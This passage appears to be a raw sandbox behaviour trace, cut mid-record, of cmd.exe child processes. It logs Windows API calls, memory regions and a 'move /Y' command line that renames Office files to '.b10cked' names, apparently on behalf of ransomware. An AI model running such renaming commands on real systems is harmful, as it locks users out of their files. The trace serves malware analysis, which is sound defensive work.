| out: lpLCData="/") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.718] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.719] GetConsoleTitleW (in: lpConsoleTitle=0x400930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.720] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.720] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.720] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.721] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.721] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.721] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.721] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.721] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.721] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.721] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0168.726] GetConsoleTitleW (in: lpConsoleTitle=0x22f628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.726] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.726] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.726] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.726] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.726] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.726] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.727] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.727] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.727] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.727] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.727] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.727] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.727] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.727] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.727] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.727] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.727] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.727] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.727] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.727] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.727] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.728] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.728] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.728] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.728] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.728] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.728] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.730] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f3e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f3dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f3dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.730] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.731] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.732] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.734] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0168.734] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0168.734] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0168.734] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~1.trx")) returned 0x2020 [0168.735] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.735] SetErrorMode (uMode=0x0) returned 0x0 [0168.735] SetErrorMode (uMode=0x1) returned 0x0 [0168.735] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x22ed6c, lpFilePart=0x22ed54 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", lpFilePart=0x22ed54*="MSOINT~1.TRX") returned 0x3c [0168.735] SetErrorMode (uMode=0x0) returned 0x1 [0168.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.736] _wcsicmp (_String1="MSOINT~1.TRX", _String2=".") returned 63 [0168.736] _wcsicmp (_String1="MSOINT~1.TRX", _String2="..") returned 63 [0168.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msoint~1.trx")) returned 0x2020 [0168.736] SetErrorMode (uMode=0x0) returned 0x0 [0168.736] SetErrorMode (uMode=0x1) returned 0x0 [0168.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", nBufferLength=0x104, lpBuffer=0x22f1e8, lpFilePart=0x22ef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", lpFilePart=0x22ef80*="MSOINT~1.TRX") returned 0x3c [0168.737] SetErrorMode (uMode=0x0) returned 0x1 [0168.737] SetErrorMode (uMode=0x0) returned 0x0 [0168.737] SetErrorMode (uMode=0x1) returned 0x0 [0168.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22f3f0, lpFilePart=0x22ef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x22ef80*="MSOINTL.DLL.trx_dll.b10cked") returned 0x4b [0168.737] SetErrorMode (uMode=0x0) returned 0x1 [0168.737] SetLastError (dwErrCode=0x0) [0168.737] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll.b10cked")) returned 0xffffffff [0168.737] GetLastError () returned 0x2 [0168.737] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x22e8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e8fc) returned 0x412130 [0168.738] FindNextFileW (in: hFindFile=0x412130, lpFindFileData=0x22e8fc | out: lpFindFileData=0x22e8fc) returned 0 [0168.987] GetLastError () returned 0x12 [0168.987] FindClose (in: hFindFile=0x412130 | out: hFindFile=0x412130) returned 1 [0168.990] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x411cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411cc0) returned 0x412130 [0168.990] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22eb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0168.990] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x22eb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0168.991] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll")) returned 0x2020 [0168.991] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\msointl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.994] FindClose (in: hFindFile=0x412130 | out: hFindFile=0x412130) returned 1 [0168.995] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eb48 | out: _Buffer=" 1") returned 9 [0168.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.995] GetFileType (hFile=0x7) returned 0x2 [0168.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ead4 | out: lpMode=0x22ead4) returned 1 [0168.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.996] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eb08 | out: lpConsoleScreenBufferInfo=0x22eb08) returned 1 [0168.996] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.997] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eb48 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.997] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eb2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eb2c*=0x1a) returned 1 [0168.997] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.997] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.998] SetConsoleInputExeNameW () returned 0x1 [0168.998] GetConsoleOutputCP () returned 0x1b5 [0168.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.999] exit (_Code=0) Process: id = "289" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22759 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22760 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22762 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 22763 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22764 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22765 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22766 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22767 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 22768 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22904 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22905 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22906 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22907 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22908 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 22909 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22910 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22911 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22912 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22913 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22914 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22915 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22916 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22917 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22918 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 22919 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22920 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22921 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22922 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22923 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 22924 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22925 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 22926 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 22927 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 353 os_tid = 0x130 [0168.681] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa64 | out: lpSystemTimeAsFileTime=0x26fa64*(dwLowDateTime=0x9bb26f00, dwHighDateTime=0x1d440a9)) [0168.681] GetCurrentProcessId () returned 0xc4 [0168.681] GetCurrentThreadId () returned 0x130 [0168.681] GetTickCount () returned 0x31d9d [0168.681] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa5c | out: lpPerformanceCount=0x26fa5c*=22547018698) returned 1 [0168.682] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.682] __set_app_type (_Type=0x1) [0168.682] __p__fmode () returned 0x76b331f4 [0168.682] __p__commode () returned 0x76b331fc [0168.682] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.682] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.682] GetCurrentThreadId () returned 0x130 [0168.682] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x130) returned 0x38 [0168.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.683] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.683] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.683] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9f4 | out: phkResult=0x26f9f4*=0x0) returned 0x2 [0168.683] VirtualQuery (in: lpAddress=0x26fa2b, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.683] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9c4, dwLength=0x1c | out: lpBuffer=0x26f9c4*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.683] GetConsoleOutputCP () returned 0x1b5 [0168.684] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.684] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.684] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.684] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.684] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.685] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.685] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.685] GetEnvironmentStringsW () returned 0x80210* [0168.685] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.685] GetEnvironmentStringsW () returned 0x80210* [0168.686] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0168.686] RegOpenKeyExW (in: hKey=0x80000002, 